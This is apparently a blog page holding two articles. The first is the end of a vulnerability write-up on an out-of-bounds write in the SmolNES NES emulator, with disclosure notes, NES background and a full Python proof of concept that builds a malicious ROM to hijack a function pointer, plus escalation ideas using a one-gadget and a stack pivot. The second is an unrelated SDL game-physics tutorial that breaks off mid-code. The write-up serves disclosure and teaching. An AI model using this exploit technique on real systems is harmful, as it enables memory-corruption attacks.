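 * little-endian bytes of `value` through $2007. `out` needs 55 bytes.
 * Returns the number of bytes emitted. */
size_t emit_pointer_overwrite(uint8_t *out, uint8_t mapper_val, uint16_t v,
                              uint64_t value) {
  size_t pos = 0;
  pos = emit_store(out, pos, mapper_val, 0x8000);          /* Mapper 3 */
  pos = emit_store(out, pos, (uint8_t)(v >> 8), 0x2006);   /* V high byte */
  pos = emit_store(out, pos, (uint8_t)(v & 0xFF), 0x2006); /* V low byte */
  for (int i = 0; i < 8; i++)
    pos = emit_store(out, pos, (uint8_t)(value >> (8 * i)), 0x2007);
  return pos;
}
```

The mapper value and V are whatever the target offset dictates; the emitted bytes then go at the ROM's entry point, followed by code that keeps the emulator running until the next frame.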

Result

RIP is controlled. The emulator jumped to the address supplied by the malicious ROM.

Toward a full exploit

Controlling RIP is not enough to execute arbitrary code on a modern system: ASLR and the NX bit are highly effective mitigations.

Two classic approaches to go further:

Option 1: One-gadget

A “one-gadget” is a gadget in libc that, when called, executes execve("/bin/sh", NULL, NULL) if certain register conditions are met. Pointing render_hook at this gadget would yield a shell without a ROP chain, given a libc address leak is available to bypass ASLR. In a real-world context, the end goal is usually not a local shell but persistence or remote access; the one-gadget remains a valid tool, it’s the post-exploitation action that changes.

Option 2: Stack pivot into rombuf

The real alternative is a stack pivot: find a gadget that places rsp (the stack pointer) into a memory region whose contents we control. rombuf is a 1 MB array (fully controlled by the malicious ROM) located in .bss. A gadget of the form mov rsp, [address_in_bss] ; ret would pivot the stack into rombuf and allow executing an arbitrary ROP chain, leading to code execution. This scenario is reinforced by the fact that rom is a global pointer (in .bss) that already points into rombuf: a gadget dereferencing this known address is enough to place rsp in the controlled region.

10. Responsible Disclosure and CVE

Reporting to the maintainer

The vulnerabilities described in this write-up were reported to the project’s maintainer (binji/smolnes) by email before this article was published. His response, unsurprisingly for a code golf project, was that he “wasn’t too worried about OOB in smolnes”. He authorized me to publish this write-up.

Why no CVE was requested

These vulnerabilities technically meet the criteria for CVE assignment: they are reproducible, documented, and the impact (guaranteed DoS, memory corruption) is real.

However, filing a CVE would have been counterproductive in this case. SmolNES is a hobby code golf project with 3 contributors, designed as a compactness exercise and not intended for production deployment. There is no proven critical exploitation path in the binary as distributed (the GOT and heap are out of reach, no function pointer exists in the reachable region).

Given the nature of the project and the absence of a critical exploitation path, I decided not to pollute the ecosystem with a pointless CVE.

This aligns with what this article describes well: CVSS scores are calculated for the worst-case deployment scenario, regardless of actual context. The author himself acknowledges that some CVEs “have no viable exploitation path or deployment, and frankly waste everyone’s time.” A hobby NES emulator is the perfect example.

11. Appendix: Required NES concepts

This appendix covers the NES architectural concepts required to understand the vulnerability.

A. NES general architecture

The NES (Nintendo Entertainment System, 1983) is made up of three main components:

CPU: a Ricoh 2A03, derived from the MOS Technology 6502. 8-bit processor, 16-bit address bus (64 KB address space).
PPU (Picture Processing Unit): the Ricoh 2C02, handles display. It has its own 16 KB address space, separate from the CPU’s.
APU (Audio Processing Unit): integrated into the CPU, handles sound (5 channels).

The game is stored on a cartridge containing two types of memory:

PRG-ROM: the game code and program data (read by the CPU via $8000-$FFFF)
CHR-ROM or CHR-RAM: the graphics data (tiles, sprites), accessed by the PPU

B. The 6502 CPU and its address space

The CPU addresses 64 KB (0x0000 to 0xFFFF), broken down as follows:

$0000 - $07FF : Internal RAM (2 KB, mirrored over $0000-$1FFF)
$2000 - $2007 : PPU registers (mirrored across the entire $2000-$3FFF range)
$4000 - $4017 : APU and I/O registers (joypads, DMA)
$6000 - $7FFF : PRG-RAM (optional cartridge RAM)
$8000 - $FFFF : PRG-ROM (game code) + Mapper registers

The Reset Vector: when the NES powers on, the CPU reads the two bytes at $FFFC-$FFFD and jumps to the address they contain. That’s the game’s entry point.
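In terms of bytes, the Reset Vector is a 16-bit little-endian value. A minimal sketch of the lookup, assuming a 16 KB bank mapped at $C000-$FFFF (reset_vector is a name introduced here):

```c
#include <stdint.h>

/* Reads the 16-bit little-endian Reset Vector from a 16 KB PRG bank mapped
 * at $C000-$FFFF. $FFFC lands at offset 0x3FFC inside that bank. */
uint16_t reset_vector(const uint8_t last_bank[16384]) {
  return (uint16_t)(last_bank[0x3FFC] | (last_bank[0x3FFD] << 8));
}
```

A bank ending in the bytes 00 80 at offsets 0x3FFC-0x3FFD therefore starts execution at $8000.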

6502 instructions relevant to the vulnerability:

LDA #val (opcode A9): loads an immediate value into accumulator A
STA $addr (opcode 8D + 2 little-endian bytes): writes A to absolute memory
INC $addr,X (opcode FE + 2 bytes): reads, increments, and writes back the memory value (Read-Modify-Write)

prg[] and memory windows:

prg is an array whose elements contain the number of a PRG bank currently mapped into CPU memory. A PRG bank is 16 KB. Example:

prg[0] = 2;  // the $8000-$BFFF range points to bank 2 of the ROM
prg[1] = 5;  // the $C000-$FFFF range points to bank 5 of the ROM

C. The PPU and VRAM

The PPU manages the display through its own 16 KB address space:

$0000 - $1FFF : Pattern Tables (CHR: 8x8 pixel tiles, 2 banks of 4 KB)
$2000 - $3EFF : Nametables (screen map)
$3F00 - $3FFF : Palette RAM (32 active colors)

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

The CPU cannot directly access VRAM. It communicates with the PPU through memory-mapped registers in the $2000-$2007 range:

$2006 (PPUADDR): sets the target address in VRAM via two consecutive writes (toggle controlled by bit W):

First write  -> high byte of the address (stored in T, temporary register)
Second write -> low byte + copy of T into V (V = active address)

case 6: // $2006 PPUADDR
    T = (W ^= 1)
      ? T & 0xff | val % 64 << 8   // 1st write: bits 8-13 of T
      : (V = T & ~0xff | val);     // 2nd write: bits 0-7 of T, then V = T
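The one-liner above is dense, so here is an expanded sketch of the same latch logic. The struct and function names are introduced for illustration; the behavior is meant to mirror the SmolNES expression, not real hardware in every detail.

```c
#include <stdint.h>

typedef struct {
  uint16_t t;  /* temporary address */
  uint16_t v;  /* active address */
  uint8_t  w;  /* write toggle: 0 before the first write */
} ppu_addr_state;

/* Models one CPU write to $2006. */
void ppuaddr_write(ppu_addr_state *p, uint8_t val) {
  p->w ^= 1;
  if (p->w) {
    /* First write: bits 8-13 of T (the top two bits of val are dropped). */
    p->t = (uint16_t)((p->t & 0x00FF) | ((val & 0x3F) << 8));
  } else {
    /* Second write: bits 0-7 of T, then T is copied into V. */
    p->t = (uint16_t)((p->t & 0xFF00) | val);
    p->v = p->t;
  }
}
```

Writing $21 then $08 leaves V = $2108; V does not change until the second write.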

$2007 (PPUDATA): reads or writes one byte at the address pointed to by V. After each access, V auto-increments:

V += ppuctrl & 4 ? 32 : 1;
V %= 16384;  // 16384 = 2^14: the PPU space is 14 bits wide (0 to 16383)

This auto-increment mechanism allows writing consecutive byte sequences to VRAM with only repeated STA $2007 instructions.

D. Mappers

The CPU only exposes 32 KB of address space for PRG-ROM, and the PPU only 8 KB for CHR. But some games need much more (Super Mario Bros. 3: 256 KB of PRG-ROM plus 128 KB of CHR-ROM, 384 KB in total).

The solution: Mappers, extra chips inside the cartridge that enable bank switching. The CPU always sees the same addresses ($8000-$FFFF), but the Mapper can connect different chunks of the ROM to those addresses.

How the game controls the Mapper: writes to the ROM region ($8000-$FFFF) do not modify the ROM (read-only). This behavior is repurposed: writes are intercepted and interpreted as bank switching commands. This is Memory-Mapped I/O (MMIO).

In SmolNES, the Mapper number is encoded in bits 4-7 of iNES header byte 6 (rombuf[6] >> 4).
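The header fields this write-up relies on can be pulled out with a few lines of C. The sketch below is illustrative: ines_info and parse_ines_header are hypothetical names, and the magic check is an addition of this sketch, not something the emulator is known to perform. Note that the full iNES format also stores the upper mapper bits in the high nibble of byte 7; only the byte-6 nibble is used here, as in rombuf[6] >> 4.

```c
#include <stdint.h>
#include <string.h>

typedef struct {
  uint8_t prg_banks;           /* header byte 4, 16 KB units */
  uint8_t chr_banks;           /* header byte 5, 8 KB units; 0 = CHR-RAM */
  uint8_t mapper;              /* high nibble of byte 6 */
  uint8_t vertical_mirroring;  /* bit 0 of byte 6 */
} ines_info;

/* Returns 0 and fills `out` if the magic matches, -1 otherwise. */
int parse_ines_header(const uint8_t header[16], ines_info *out) {
  if (memcmp(header, "NES\x1a", 4) != 0) return -1;
  out->prg_banks = header[4];
  out->chr_banks = header[5];
  out->mapper = header[6] >> 4;
  out->vertical_mirroring = header[6] & 1;
  return 0;
}
```

A header with byte 5 equal to 0 and byte 6 equal to 0x30 parses as CHR-RAM mode with Mapper 3, the exact combination the fuzzing harness forces.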

E. CHR-ROM vs CHR-RAM

CHR-ROM: most games store their graphics in a dedicated ROM chip on the cartridge. Graphics are fixed. chrrom points into the ROM file buffer.

CHR-RAM: some games (such as The Legend of Zelda and Metroid) ship without a CHR-ROM chip. The cartridge carries 8 KB of RAM instead, which lets the game modify its graphics dynamically. chrrom then points to chrram[8192].

In SmolNES, header byte 5 (rombuf[5]) determines the mode:

chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//       ^if != 0: CHR-ROM from the file       ^if 0: CHR-RAM (static 8 KB)

This distinction is at the heart of the vulnerability: Mappers allow selecting among multiple CHR banks. In CHR-ROM mode, having multiple banks is normal: the ROM file can contain many. But in CHR-RAM mode, there are only 2 physical 4 KB banks (0 and 1, i.e. 8 KB in total). Selecting bank 2 or higher goes past the end of chrram[8192].

F. Mapper 3 (CNROM)

Mapper 3, also known as CNROM, is one of the simplest. It only manages the CHR bank. Any write to $8000-$FFFF changes the active graphics bank:

case 3: // mapper 3 (CNROM)
    chr[0] = val % 4 * 2;   // val % 4 gives 0, 1, 2, or 3; * 2 gives 0, 2, 4, or 6
    chr[1] = chr[0] + 1;    // Next bank: 1, 3, 5, or 7
    break;

// CHR bank is selected in pairs (two 4 KB sub-banks)
// Bank 0: chr[0]=0, chr[1]=1  (offsets 0 and 4096 into chrram -> valid)
// Bank 1: chr[0]=2, chr[1]=3  (offsets 8192 and 12288          -> OVERFLOW if CHR-RAM)
// Bank 2: chr[0]=4, chr[1]=5  (offsets 16384 and 20480         -> even further)
// Bank 3: chr[0]=6, chr[1]=7  (offsets 24576 and 28672         -> maximum range)

In CHR-ROM mode, all these offsets are valid. In CHR-RAM mode, only offsets 0 and 4096 (bank 0) are valid.
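
The offset arithmetic can be checked with a small standalone sketch. It assumes, as the PoC notes in section 12 do, that a pattern-table address is resolved as chr[bank] * 4096 plus the low 12 bits. The function names and the bounds guard are hypothetical; SmolNES performs no such check.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define CHR_BANK_SIZE 4096u   /* one 4 KB sub-bank */
#define CHRRAM_SIZE   8192u   /* size of the static CHR-RAM buffer */

/* Offset into the CHR buffer for a pattern-table address (< 0x2000)
 * after a Mapper 3 write of `val`, following the bank math above. */
size_t cnrom_chr_offset(uint8_t val, uint16_t ppu_addr) {
    unsigned chr0 = (val % 4u) * 2u;
    unsigned bank = (ppu_addr & 0x1000) ? chr0 + 1u : chr0;
    return (size_t)bank * CHR_BANK_SIZE + (ppu_addr & 0x0FFF);
}

/* Hypothetical guard: true when the access stays inside chr_size bytes. */
bool chr_offset_in_bounds(size_t offset, size_t chr_size) {
    return offset < chr_size;
}
```

With val = 2 and a PPU address of 0x0878, the offset is 18552, well past the 8192-byte buffer. A guard of this kind, or reducing the bank index modulo the number of banks actually present, is one possible way to reject the access.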

G. The iNES file format

A .nes file begins with a 16-byte header:

Offset  Size  Description
0       4     "NES\x1A" (magic number)
4       1     Number of PRG-ROM banks (16 KB each)
5       1     Number of CHR-ROM banks (8 KB each). 0 = CHR-RAM mode
6       1     Flags:
                bit 0    : mirroring (0=horizontal, 1=vertical)
                bit 1    : battery (persistent PRG-RAM)
                bit 2    : trainer (512 bytes before PRG-ROM)
                bits 4-7 : low nibble of Mapper number
7       1     Flags:
                bits 4-7 : high nibble of Mapper number
8-15    8     Unused (base iNES format)

In SmolNES, these values are read from rombuf without validation and used directly to configure the emulator.
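
For contrast, a validating parser for the header could look like the sketch below. The InesInfo type and ines_parse function are invented for this example; rejecting a ROM with zero PRG banks is a choice made here, not something the iNES format description above mandates.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical summary of the fields described in the table above. */
typedef struct {
    size_t  prg_size;      /* bytes of PRG-ROM */
    size_t  chr_size;      /* bytes of CHR-ROM, 0 when CHR-RAM is used */
    uint8_t mapper;        /* full 8-bit mapper number */
    bool    has_trainer;
    bool    uses_chr_ram;
} InesInfo;

/* Returns false when the buffer cannot be a well-formed iNES image. */
bool ines_parse(const uint8_t *buf, size_t len, InesInfo *out) {
    if (len < 16 || memcmp(buf, "NES\x1A", 4) != 0) return false;

    out->prg_size     = (size_t)buf[4] * 16384;
    out->chr_size     = (size_t)buf[5] * 8192;
    out->mapper       = (uint8_t)((buf[7] & 0xF0) | (buf[6] >> 4));
    out->has_trainer  = (buf[6] & 0x04) != 0;
    out->uses_chr_ram = (buf[5] == 0);

    /* The declared banks must actually be present in the file. */
    size_t need = 16 + (out->has_trainer ? 512 : 0)
                + out->prg_size + out->chr_size;
    return buf[4] != 0 && len >= need;
}
```

The header built by the PoC script (1 PRG bank, 0 CHR banks, byte 6 = 0x30) parses as Mapper 3 in CHR-RAM mode, so a check like this would not stop the malicious ROM by itself; the bank index still has to be bounded at access time.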

12. Resources

PoC script for modified binary

#!/usr/bin/env python3
"""
PoC ROM for smolnes: OOB Write via Mapper 3 CHR-RAM -> overwrite render_hook.

.bss layout (smolnes/deobfuscated binary compiled with poc_hook.c as second source):
  chrram      : offset 0       (8192 bytes)
  render_hook : offset 18552   (8 bytes, uint8_t*)

Parameters:
  - Mapper 3 active (rombuf[6] >> 4 == 3)
  - CHR-RAM mode (rombuf[5] == 0) => chrrom = chrram
  - val=2 written to $8000 => chr[0] = 2%4*2 = 4
  - V = 0x0878 (via two $2006 writes)
  - get_chr_byte(0x0878) = &chrram[chr[0]*4096 + 0x878] = &chrram[18552] = &render_hook

Target: write 0xDEADBEEF into render_hook (little-endian, 8 bytes).
Trigger: when scany==241, dot==1, smolnes calls render_hook() => SIGSEGV.
"""

TARGET_ADDR = 0xDEADBEEF

# ---- Parameter calculation ----
CHRRAM_SIZE   = 8192
HOOK_OFFSET   = 18552                # p/d (long)&render_hook - (long)&chrram
BANK_INDEX    = HOOK_OFFSET // 4096  # = 4 (chr[0] to reach)
INTRA_OFFSET  = HOOK_OFFSET % 4096  # = 2168 = 0x878

assert BANK_INDEX in [2, 4, 6], f"Bank {BANK_INDEX} not reachable with Mapper 3 (val%4*2)"
MAPPER_VAL = BANK_INDEX // 2        # val such that val%4*2 = BANK_INDEX => val = BANK_INDEX/2

# V = INTRA_OFFSET: V < 0x1000 falls in pattern table 0, which is resolved through chr[0]
V = INTRA_OFFSET  # 0x878

V_HIGH = (V >> 8) & 0x3F            # high byte for $2006 (6 bits)
V_LOW  = V & 0xFF                   # low byte for $2006

TARGET_BYTES = TARGET_ADDR.to_bytes(8, 'little')

print(f"[*] render_hook offset from chrram: {HOOK_OFFSET} (0x{HOOK_OFFSET:04X})")
print(f"[*] Bank index: {BANK_INDEX} => mapper write val={MAPPER_VAL} to $8000")
print(f"[*] V = 0x{V:04X} => $2006 writes: 0x{V_HIGH:02X} then 0x{V_LOW:02X}")
print(f"[*] Target: 0x{TARGET_ADDR:016X}")
print(f"[*] Little-endian bytes: {TARGET_BYTES.hex()}")

# ---- 6502 code construction ----
code = bytearray()

def nop():
    return bytes([0xEA])

def lda_imm(val):
    return bytes([0xA9, val])

def sta_abs(addr):
    return bytes([0x8D, addr & 0xFF, addr >> 8])

def jmp_abs(addr):
    return bytes([0x4C, addr & 0xFF, addr >> 8])

# Step 1: Mapper 3, write to $8000 to set chr[0] = BANK_INDEX
code += lda_imm(MAPPER_VAL)
code += sta_abs(0x8000)

# Step 2: set V via two consecutive writes to $2006
code += lda_imm(V_HIGH)
code += sta_abs(0x2006)
code += lda_imm(V_LOW)
code += sta_abs(0x2006)

# Step 3: write the 8 bytes of TARGET_ADDR via $2007
# get_chr_byte(V) => &chrram[HOOK_OFFSET] = &render_hook
# V auto-increments by 1 after each access => consecutive writes
for byte in TARGET_BYTES:
    code += lda_imm(byte)
    code += sta_abs(0x2007)

# Infinite loop (NOP + JMP) to let the PPU advance to scany==241
nop_offset = len(code)
code += nop()                            # NOP
code += jmp_abs(0x8000 + nop_offset)     # JMP back to NOP

print(f"[*] Code size: {len(code)} bytes (starts at $8000)")
print(f"[*] NOP loop at $8000+{nop_offset} = $" + f"{0x8000+nop_offset:04X}")

# ---- iNES ROM construction ----
PRG_SIZE = 16384  # 1 PRG bank = 16 KB

# iNES header (16 bytes)
header = bytearray(16)
header[0:4] = b'NES\x1a'
header[4] = 1         # 1 PRG bank (16 KB)
header[5] = 0         # 0 CHR banks => CHR-RAM mode
header[6] = 0x30      # Mapper 3 (high nibble = 3), horizontal mirroring
# bytes 7-15 = 0x00

# PRG ROM: filled with NOPs (0xEA), code at the start, reset vector at the end
prg = bytearray(nop() * PRG_SIZE)

# Code at offset 0 ($8000)
prg[0:len(code)] = code

# Reset vector at $FFFC-$FFFD (offset 0x3FFC in PRG): points to $8000
prg[PRG_SIZE-4] = 0x00   # low byte of $8000
prg[PRG_SIZE-3] = 0x80   # high byte of $8000

rom = bytes(header) + bytes(prg)

output_path = "poc_deadbeef.nes"
with open(output_path, "wb") as f:
    f.write(rom)

print(f"\n[+] ROM written: {output_path} ({len(rom)} bytes)")
print(f"[+] Run: ./smolnes/deobfuscated {output_path}")
print(f"[+] Expected: SIGSEGV / call to 0x{TARGET_ADDR:X} after ~1 PPU frame")

References

NESDev Wiki: the definitive resource for NES technical details
NesHacker playlist: excellent explanations of NES internals

Building a physics system with SDL

Dec 28, 2024

This article looks at how to build physics behaviors (gravity, collisions, bounces) in the context of developing DuckDuckGame. It does not cover how objects are represented in space, only the physics applied to those objects.

Gravity

Creating gravity is very simple: at a regular time interval (every frame), the object's vertical speed must increase. All it takes is a variable representing that speed, to which a fixed value is added, as in the following code:

speed += 0.2;
personnage->rect->y += speed;

And there we go! Our character falls.
Note that this approach depends on how many times per second this code runs: the more often it runs, the faster the fall. To compensate, we would need a variable holding the time elapsed since the last frame (known as DeltaTime) and multiply our speed increase by it (so that when the frame rate is high, the distance covered per frame is small, and vice versa).
However, obtaining such a value comes with its own technical challenges, which is why the rest of this document assumes a fixed frame rate.
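
For reference, the DeltaTime variant could look like the sketch below. It is not used in the rest of the article; the Body type, the function name, and the choice of passing gravity as a parameter are all assumptions made for this example.

```c
/* Hypothetical body type for this sketch: vertical position and speed only. */
typedef struct {
    float y;
    float vy;
} Body;

/* Advance the body by dt seconds under constant gravity. */
void apply_gravity(Body *b, float gravity, float dt) {
    b->vy += gravity * dt;   /* the speed gain scales with elapsed time */
    b->y  += b->vy * dt;     /* so does the distance covered */
}
```

With this form, two half-second steps and one full-second step end at the same speed. The position still depends slightly on the step size, which is one of the challenges a variable frame rate brings.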

Collisions

The first code handling collisions was this:

speed += 0.2;
if (personnage->rect->y >= 500) {
    personnage->rect->y = 500;
    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

It relied on a speed variable (representing the vertical speed) that was added to the character's position every frame, making it fall with increasing speed.
The ground was the coordinate Y=500, to which the character was brought back whenever it went past it.

Note that rect->y is the character's top edge: at y=500 its top is at 500 and its bottom at 500+h, so slightly inside the ground. The correct position would be personnage->rect->y = 500 - personnage->rect->h, but this does not change the demonstration of the principle.

However, this method caused a small problem:
when the character fell from high up, its speed made it visibly overshoot the 500 line before being brought back on the next frame, producing a rollback effect.

Anticipating the next position

The fix was to anticipate the character's position on the next frame in order to place it directly at the right spot (we could also have checked the character's Y position again just before rendering, but that amounts to much the same thing). This idea of anticipating the next position is a foundation for the rest of this collision system.

Here is the code implementing this idea:

speed += 0.2;
if (personnage->rect->y + speed >= 500) {
    personnage->rect->y = 500;
    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

(The "+ speed" after the character's Y position in the if: a discreet but very effective change.)

From here, we can extend an object's structure so that it stores the object's X and Y speed values.
We will also create a function (GetNextPosition) that uses them to return the Rect of our object's next position.
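
A possible shape for that structure and function is sketched below. The Rect type stands in for SDL_Rect so the example compiles without SDL, and Element is a hypothetical layout. Unlike the GetNextPosition used later in the article, which hands back an SDL_Rect pointer, this version returns the rectangle by value.

```c
/* Stand-in for SDL_Rect so the sketch compiles without SDL. */
typedef struct { int x, y, w, h; } Rect;

/* Hypothetical object layout: a rectangle plus a velocity on each axis. */
typedef struct {
    Rect  rect;
    float vX;
    float vY;
} Element;

/* Return the rectangle the element would occupy on the next frame. */
Rect get_next_position(const Element *e) {
    Rect next = e->rect;
    next.x += (int)e->vX;   /* fractional parts are truncated */
    next.y += (int)e->vY;
    return next;
}
```

The element itself is left untouched, so the caller can compare the current and the projected positions before committing to a move.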

Object-to-object collisions

The next step is to improve what our player collides with. For now we simply use a height hard-coded in the source, so let's try using another game object instead!

We therefore move on to "Object - Object" collisions:
to know whether one object collides with another, we need to know whether they overlap, in other words whether they intersect.
Since we only use rectangles for now, we can conveniently use the SDL function SDL_IntersectRect, which tells us whether two Rects intersect and, if so, gives us the rectangle representing that intersection, as shown in the following diagram:

In our case, we have a character intersecting a rectangle that represents the ground, as follows:

We can see the collision between these two objects: SDL_IntersectRect would indeed return SDL_TRUE, and we would also get back the equivalent of the blue rectangle here, which represents the intersection of the two Rects.
Note also that this diagram does not show the next-position simulation we built earlier. In practice, at rest the character would be sitting on the ground and would gain vertical velocity every frame (due to gravity). That would move its next-position box into the ground, which lets us detect the collision and cancel the vertical speed gained, effectively keeping the character still on the ground and preventing it from falling through.
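
To show what such an intersection test computes, here is a hand-written sketch that approximates it. It is not SDL's implementation; Rect stands in for SDL_Rect and rect_intersect is a hypothetical name.

```c
#include <stdbool.h>

/* Stand-in for SDL_Rect so the sketch compiles without SDL. */
typedef struct { int x, y, w, h; } Rect;

static int max_i(int a, int b) { return a > b ? a : b; }
static int min_i(int a, int b) { return a < b ? a : b; }

/* Returns true and fills `out` when a and b overlap. */
bool rect_intersect(const Rect *a, const Rect *b, Rect *out) {
    int left   = max_i(a->x, b->x);
    int top    = max_i(a->y, b->y);
    int right  = min_i(a->x + a->w, b->x + b->w);
    int bottom = min_i(a->y + a->h, b->y + b->h);

    /* No overlap, or edges that only touch. */
    if (right <= left || bottom <= top) return false;

    out->x = left;
    out->y = top;
    out->w = right - left;
    out->h = bottom - top;
    return true;
}
```

The height of the resulting rectangle is how far the character has sunk into the ground, which is the amount the resolution step has to undo.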

In our code, all we need to do is use SDL_IntersectRect to detect a collision between our character's future position and the object collided with. If there is one, we move the player on top of it:
personnage->y = obstacle->y - personnage->height
OR
personnage->y = personnageNextPos->y - IntersectRect->height

SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
SDL_Rect* colliderNextPos = GetNextPosition(collider); // GhostBox: projection of the player's future position
// Remember the trick of using the object's next position.

// collideePos is the obstacle's Rect (presumably collidee->rect)
SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collideePos, intersect);

if (hasCollided == SDL_TRUE) {
    collider->rect->y = collidee->rect->y - collider->rect->h;
}

free(intersect);

We now finally have a system that lets the character fall onto an object and stay on it without moving!

Multi-directional collisions

However, a new problem appears :)
The code above would produce situations like this one:

If our player collides from the side with what represents the ground, it gets teleported on top of it.
This is obviously not the behavior we want, so we need to adapt our code to make it more general.
The goal is to handle collisions cleanly whether they come from the side, from above, or from below!

To begin with, though, let's stick to making collisions work on a single axis.
Our current code works for a collision on a single axis AND coming from only one side of that axis. Indeed, if we collide with the ground we coded just above, we get teleported on top of it.

To start solving this, let's first switch axes. The Y axis we have used so far was intuitive from a gravity standpoint, but the fact that its value increases going downward is not.
So let's take a wall as our example and define the terms used in the explanation:
in the examples that follow, we refer to the player's next position as the GhostBox, which is simply a projection of the player based on its current velocity.

With what we defined earlier, this collision would be resolved by placing the player right up against the wall.

Here is the complete code implementing collisions from all sides, with several objects at once:

WindowElement* collider = personnage;
SDL_Rect* colliderNextPos = GetNextPosition(collider); // GhostBox: projection of the player's future position

// obs holds the objects of the world
for (unsigned i = 0; i < obs->lenght; ++i) {
    WindowElement* collidee = obs->objects + i; // same as &obs->objects[i]
    SDL_Rect* collideeNextPos = GetNextPosition(collidee);

    SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
    SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collideeNextPos, intersect);

    if (hasCollided == SDL_TRUE) {

        // Each of these `if`s checks where the collider is relative to the collidee using their current positions,
        // NOT their future positions, while knowing that their next positions do collide.
        // Here, for example, we know a collision WILL happen, and we check whether it comes from above
        if (collider->rect->y + collider->rect->h <= collidee->rect->y)
        {
            collider->vY = 0;
            colliderNextPos->y -= intersect->h;
        }
        else if (collider->rect->y >= collidee->rect->y + collidee->rect->h) // collision comes from below
        {
            collider->vY = 0;
            colliderNextPos->y += intersect->h;
        }

        if (collider->rect->x + collider->rect->w <= collidee->rect->x) // collision comes from the left
        {
            collider->vX = 0;
            colliderNextPos->x -= intersect->w;
        }
        else if (collider->rect->x >= collidee->rect->x + collidee->rect->w) // collision comes from the right
        {
            collider->vX = 0;
            colliderNextPos->x += intersect->w;
        }
    }

    free(intersect);

    collidee->rect->x = collideeNextPos->x;
    collidee->rect->y = collideeNextPos->y;
}
// Now that we have built a consistent next position, we apply it
collider->rect->x = colliderNextPos->x;
collider->rect->y = colliderNextPos->y;

Collision resolution order

This implementation has a subtlety: collisions are resolved in the order of the obs->objects array. In DuckDuckGame, two ground objects, A and B, teleport in a loop to simulate infinite scrolling, and the player can end up colliding with both at once at their junction.

If A is resolved first, only a vertical collision is detected; it is resolved correctly and B no longer causes trouble. If B is resolved first, however, the GhostBox overlaps it on both Y and X, and the two resolutions are mutually exclusive. Since our code checks Y before X, the behavior depends on which of the two conditions is satisfied, and at a junction a player sliding horizontally can trigger the X collision first, which blocks it as if against an invisible wall.

Note that resolving X before Y would not fix the problem at the engine level: it would simply flip the problematic case. Two walls stacked vertically would then form an invisible platform.

Several approaches were considered to determine the resolution order:

Naive distance (center to center): sort by the distance between the player's center and each object's center. Rejected: if A and B have radically different sizes, the distance is biased by size rather than reflecting actual proximity.
Intersection area: resolve first the object with the largest collision area. This makes the problem less likely but does not eliminate it.
Double computation: compute both possible resolutions and keep the one that ends up farthest away. Costly and probably prone to edge cases.
Orthogonal projection: for each object, orthogonally project the player's center onto the object to get the closest point belonging to it, then sort by that distance. This fixes the size bias while staying simple.

In practice, the problem was imperceptible in the final game, so this approach never went beyond the thinking stage.
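
Since the orthogonal projection idea was never implemented, the following is only a sketch of what its sorting key could be: the squared distance from the player's center to the closest point of each rectangle. Rect stands in for SDL_Rect and the function names are hypothetical.

```c
/* Stand-in for SDL_Rect so the sketch compiles without SDL. */
typedef struct { int x, y, w, h; } Rect;

static int clamp_i(int v, int lo, int hi) {
    return v < lo ? lo : (v > hi ? hi : v);
}

/* Squared distance from point (px, py) to the closest point of r.
 * Returns 0 when the point lies inside the rectangle. */
long closest_point_dist_sq(int px, int py, const Rect *r) {
    int cx = clamp_i(px, r->x, r->x + r->w);   /* projection on the X extent */
    int cy = clamp_i(py, r->y, r->y + r->h);   /* projection on the Y extent */
    long dx = (long)px - cx;
    long dy = (long)py - cy;
    return dx * dx + dy * dy;
}
```

Sorting the colliding objects by this value before running the resolution loop would handle the nearest surface first, regardless of how large each object is.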

Attempt: continuous collisions

This approach works perfectly well for typical use, but it has limits in extreme cases. Suppose the player moves at a very high speed: its GhostBox could land directly behind the obstacle, and the player would therefore pass through it. Here is a diagram illustrating this:

We can try implementing a solution with SDL_UnionRect (SDL_UnionFRect in the float version used in the code), which returns the rectangle spanning from the player to its GhostBox (future position).

The only difference from the previous code is the detection: instead of using the GhostBox directly, we build a deltaBox covering the player from its current position to its GhostBox, then check for an intersection with that box. The resolution stays identical.

SDL_FRect* deltaBox = (SDL_FRect*) malloc(sizeof(SDL_FRect));
SDL_UnionFRect(collider->rect, colliderNextPos, deltaBox);
SDL_bool hasCollided = SDL_HasIntersectionF(deltaBox, collideeNextPos);
free(deltaBox);

After testing this method, I see one problem and theorize another.
The problem I observe is that a character standing on a rising platform can no longer jump. After investigation, this is because the union box in this code includes the character's current position and is not based solely on its future positions. This creates a collision where there would have been none in the future.
This problem can be mitigated by removing the width and height of the character's Rect from the box and shifting it in the right direction.
However, this problem made me think of another one. The union box exists to keep collisions continuous even when the object moves at high speed, but if the object moves diagonally, the box extends into the two corners on either side of the diagonal path and can collide with a wall that the object would simply have passed beside with a normal computation. Fixing this would require raycasts to check whether a LINEAR intersection exists. See the following diagram:

Since the initial system is already sufficient for what we are doing, and since we do not have unlimited time to experiment, we will go back to the previous version of the collision system, which already does the job. Still, if we ever need a more robust version, we have the model here.
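
The linear intersection check mentioned above was not implemented in DuckDuckGame. One common way to do it is the slab method for a segment against an axis-aligned rectangle, sketched here under the assumption that only the path of a single point (for example the player's center) is tested. FRect stands in for SDL_FRect and the function name is hypothetical.

```c
#include <stdbool.h>

/* Stand-in for SDL_FRect so the sketch compiles without SDL. */
typedef struct { float x, y, w, h; } FRect;

/* True when the segment (x0,y0)-(x1,y1) touches rectangle r. */
bool segment_hits_rect(float x0, float y0, float x1, float y1, const FRect *r) {
    float origin[2] = {x0, y0};
    float delta[2]  = {x1 - x0, y1 - y0};
    float lo[2]     = {r->x, r->y};
    float hi[2]     = {r->x + r->w, r->y + r->h};
    float tmin = 0.0f, tmax = 1.0f;   /* parameter range of the segment */

    for (int i = 0; i < 2; ++i) {
        if (delta[i] == 0.0f) {
            /* Parallel to this axis: must already be within the slab. */
            if (origin[i] < lo[i] || origin[i] > hi[i]) return false;
        } else {
            float t1 = (lo[i] - origin[i]) / delta[i];
            float t2 = (hi[i] - origin[i]) / delta[i];
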